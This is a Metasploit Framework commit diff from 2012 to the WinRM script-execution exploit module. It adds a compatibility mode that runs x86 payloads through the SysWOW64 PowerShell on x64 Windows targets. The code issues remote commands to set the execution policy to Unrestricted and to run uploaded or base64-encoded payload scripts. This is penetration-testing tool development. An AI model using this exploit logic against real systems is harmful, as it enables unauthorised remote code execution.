Merge branch 'feature/winrm_compat_mode' of git://github.com/dmaloney-r7/metasploit-framework into dmaloney-r7-feature/winrm_compat_mode

sinn3r · sinn3r · commit b465d20d61f8 · 2012-12-12T11:59:23.000-06:00
diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb
@@ -65,7 +65,7 @@ def initialize(info = {})
 			OptString.new( 'DECODERSTUB',  [ true, 'The VBS base64 file decoder stub to use.',
 				File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_sleep")]),
 		], self.class)
-
+		@compat_mode = false
 	end
 
 	def check
@@ -83,7 +83,6 @@ def exploit
 			return
 		end
 		if powershell2?
-			return unless correct_payload_arch?
 			path = upload_script
 			return if path.nil?
 			exec_script(path)
@@ -127,15 +126,15 @@ def upload_script
 
 	def exec_script(path)
 		print_status "Attempting to execute script..."
-		cmd = "powershell -File #{path}"
+		cmd = "#{@invoke_powershell} -File #{path}"
 		winrm_run_cmd_hanging(cmd)
 	end
 
 	def encoded_psh(script)
 		script = script.chars.to_a.join("\x00").chomp
 		script << "\x00" unless script[-1].eql? "\x00"
 		script = Rex::Text.encode_base64(script).chomp
-		cmd = "powershell -encodedCommand #{script}"
+		cmd = "#{@invoke_powershell} -encodedCommand #{script}"
 	end
 
 	def temp_dir
@@ -173,11 +172,12 @@ def check_remote_arch
 	end
 
 	def correct_payload_arch?
-		target_arch = check_remote_arch
-		case target_arch
+		@target_arch = check_remote_arch
+		case @target_arch
 		when "x64"
 			unless datastore['PAYLOAD'].include? "x64"
-				print_error "You selected an x86 payload for an x64 target!"
+				print_error "You selected an x86 payload for an x64 target...trying to run in compat mode"
+				@compat_mode = true
 				return false
 			end
 		when "x86"
@@ -218,8 +218,15 @@ def powershell2?
 			end
 		end
 
+		return false unless correct_payload_arch? or @target_arch == "x64"
+		if @compat_mode == true
+			@invoke_powershell = "%SYSTEMROOT%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
+		else
+			@invoke_powershell = "powershell"
+		end
+
 		print_status "Attempting to set Execution Policy"
-		streams = winrm_run_cmd("powershell Set-ExecutionPolicy Unrestricted")
+		streams = winrm_run_cmd("#{@invoke_powershell} Set-ExecutionPolicy Unrestricted")
 		if streams == 401
 			print_error "Login failed!"
 			return false
@@ -228,7 +235,7 @@ def powershell2?
 			print_error "Recieved error while running check"
 			return false
 		end
-		streams = winrm_run_cmd("powershell Get-ExecutionPolicy")
+		streams = winrm_run_cmd("#{@invoke_powershell} Get-ExecutionPolicy")
 		if streams['stdout'].include? 'Unrestricted'
 			print_good "Set Execution Policy Successfully"
 			return true
